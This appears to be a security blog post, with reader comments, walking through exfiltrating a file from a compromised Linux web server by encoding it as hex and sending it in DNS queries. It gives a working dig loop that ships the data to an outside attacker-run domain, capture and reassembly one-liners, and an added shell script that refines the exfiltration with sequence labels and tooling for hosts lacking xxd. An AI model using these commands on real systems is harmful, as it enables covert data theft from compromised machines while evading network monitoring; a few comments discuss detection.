Post Exploitation: DNS Data Exfiltration

If you have compromised a Linux web server (for example) and want to exfiltrate data from it, consider the following method, which smuggles the data out inside DNS queries:

First, before we begin, we need a place to send the data we want to exfil. For that, we're using a public server running BIND. If you need to snag a copy of BIND:

sudo apt install bind9

The service will probably start automagically after installation. Also, because our server is behind NAT, we had to set up a port forwarding rule for UDP port 53 back to our internal DNS server (dig uses UDP by default, so that is the port the queries arrive on).

The goal is to exfil the GIF image below from our already compromised web server:

[Screenshot Capture1.JPG: linux.gif, the image to be exfiltrated]

First, we hex-encode the image with the command below. xxd -p writes 60 hex characters (30 bytes) per line, which conveniently fits inside a single DNS label (63 characters maximum):

xxd -p linux.gif > linux.gif.hex

[Screenshot Capture2.JPG: contents of linux.gif.hex, one 60-character hex line per 30 bytes]

Now that the file is encoded (as seen above), we need to make sure we're able to capture the DNS requests on the receiving end. On our DNS server, we can fire up a tcpdump probe:

sudo tcpdump -i eth0 -s0 -w capture1.pcap port 53

[Screenshot Capture3: tcpdump listening on port 53 on the DNS server]

Back on our compromised host, we can begin to exfil the file using the command below. Each line of the hex file becomes one query name, so a file of a few kilobytes produces hundreds of queries:

for b in `cat linux.gif.hex`; do dig @aws.shellgam3.com $b.shellgam3.com; done

Because dig is pointed straight at aws.shellgam3.com, this needs outbound UDP/53 from the compromised host to the internet. If only the internal resolver is reachable, drop the @server so the queries go through that resolver; the shellgam3.com zone then has to be delegated to our BIND server (via NS records at the parent) for the queries to arrive there.

The exfiltration process as seen on the compromised host:

[Screenshot Capture4.JPG: the dig loop running on the compromised host]

On our DNS server, we can run the following command to make sure we have captured data:

tcpdump -n -r capture1.pcap | grep shellgam3.com

This should output hundreds of lines of text that look similar to the below:

[Screenshot Capture5: tcpdump -r output showing the queries for shellgam3.com]

Before we can reverse the hex encoding, we first need to strip everything else out of the PCAP output and reassemble the original hex file. We can use the one-liner below to achieve this:

tcpdump -r capture1.pcap -n | grep shellgam3.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > linux.gif.hex

Two things to check before trusting the result. The field number given to cut depends on the exact tcpdump output: with dig's default EDNS option tcpdump prints an extra [1au] field, which makes the query name the ninth whitespace-separated field, so compare against the grep output above first. And uniq only removes adjacent duplicates, which is what a retransmitted query looks like; two genuinely identical consecutive lines in the hex file (for example a run of repeated 30-byte blocks) would also be collapsed into one, corrupting the file.

[Screenshot Capture6: the recovered linux.gif.hex on the DNS server]

Finally, we need to reverse the hex encoding (xxd -r -p, the inverse of the xxd -p step above) to return our file to its original state:

[Screenshot Capture7: xxd -r -p restoring linux.gif from linux.gif.hex]

After copying the file to /var/www/html/files, we can use our web browser to make sure the file has been returned to its original state and is viewable:

[Screenshot Capture8: the restored linux.gif displayed in a browser]
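As an added example (not from the original post), the following POSIX shell script packages the same encode, send and reassemble pipeline with two changes a practitioner would want: every query name carries a sequence-number label, so the receiver dedupes and reorders by sequence instead of relying on uniq and arrival order, and the hex conversion is done with od and printf so it also runs on a compromised host without xxd. The zone shellgam3.com and the tcpdump line layout are taken from the post; the function names, the sequence-label framing and the sample capture lines used to exercise it are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not the post's own code: sequence-numbered DNS exfil framing
# plus a receiver that reassembles the file from `tcpdump -n -r` text output.
# Assumed: the zone shellgam3.com (from the post); the <seq>.<hex>.<zone>
# framing and the function names below are this example's own.
set -eu

ZONE="shellgam3.com"   # from the post; substitute your own delegated zone
CHUNK=60               # hex chars per label (30 bytes); a DNS label holds at most 63 octets

# Encode stdin as one query name per line: <seq>.<hex>.<zone>
# Same bytes as `xxd -p`, but built on od, which minimal hosts usually have.
encode_names() {
    od -An -v -tx1 | tr -d ' \n' | fold -w "$CHUNK" \
        | awk -v zone="$ZONE" '{ printf "%d.%s.%s\n", NR - 1, $0, zone }'
}

# Send each name with dig, as the post does. Needs network access and a
# listening server, so it is only shown here, not exercised offline.
send_names() {   # usage: encode_names < file | send_names <server-ip>
    while read -r name; do
        dig +short +tries=1 +time=2 @"$1" "$name" > /dev/null 2>&1 || true
    done
}

# Inverse of the hex encoding (what `xxd -r -p` does), in plain sh:
# hex text on stdin, raw bytes on stdout.
hex_to_bytes() {
    { tr -d ' \n\r'; echo; } | fold -w2 | while read -r hh; do
        [ -n "$hh" ] || continue
        printf "\\$(printf '%03o' "0x$hh")"
    done
}

# Rebuild the file from `tcpdump -n -r capture.pcap` text on stdin.
# Keyed on the sequence label: retransmitted queries collapse to one line and
# out-of-order lines sort back into place. Plain `uniq` would also merge two
# adjacent chunks that are genuinely identical, which real files do contain.
decode_capture() {
    sed -n "s/.* A? \([0-9][0-9]*\)\.\([0-9a-f]*\)\.$ZONE\..*/\1 \2/p" \
        | sort -n -k1,1 -u | cut -d' ' -f2 | tr -d '\n' | hex_to_bytes
}
```

Usage is the same shape as the post: `encode_names < linux.gif | send_names 203.0.113.10` on the compromised host, then `tcpdump -n -r capture1.pcap | decode_capture > linux.gif` on the DNS server. The response lines in the capture carry no query name, so the sed filter ignores them without a separate grep.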

Below is the Wireshark output that was captured on the compromised host side while the exfil was taking place:

[Screenshot Capture9: Wireshark capture of the outbound DNS queries on the compromised host]


6 thoughts on “Post Exploitation: DNS Data Exfiltration”

  1. Thanks a lot for the great article. It is a good inspiration for developing security monitoring.
    I tried to find the same pattern of hex strings shown in the different screenshots, but without success? It seems that the images were taken at different times?!


    1. Malle, this type of exfiltration will generate an extremely high amount of outbound DNS requests. If you’re tracking that sort of thing by host, you should be able to see the spike when compared against other hosts. I’m not an expert in this arena, but that’s how I would initially approach detection. I wouldn’t doubt if there’s a better option though.


  2. With DNS lookup over UDP, I believe you can get max 512 bytes per request. This might not work if we have layer 7 inspection; it will detect it as a non-DNS packet. The assumption here is that outbound DNS is allowed from the compromised host. For a secure environment, DNS queries will only be allowed from the corporate DNS server.


  3. Thanks for the great article; this concept and method demonstrates how creativity is key with new attack vectors. Higher skilled attackers are those who leverage knowledge of an operating system and its ‘features’ to their advantage. There is no need to drop binaries on machines and risk detection when things such as PowerShell are just as powerful to the attacker as to the defender. Great blog, keep up the great posts.
